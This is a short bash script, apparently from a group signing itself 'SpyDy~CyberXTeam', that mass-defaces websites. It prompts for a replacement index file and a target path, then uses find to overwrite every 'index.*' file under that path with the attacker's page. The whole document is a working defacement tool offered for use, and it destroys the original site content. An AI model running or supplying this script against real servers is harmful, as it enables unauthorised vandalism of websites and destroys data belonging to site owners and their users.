#!/bin/bash
echo '################ SpyDy~CyberXTeam ###########################'
echo '[+] your index path on the server'
read index 
echo
echo '[+] enter the path To deface '
read path
echo
echo '[+] Starting ........'
find $path -name "index.*" -exec cp $index {} \;
echo 
echo '[+] Done !'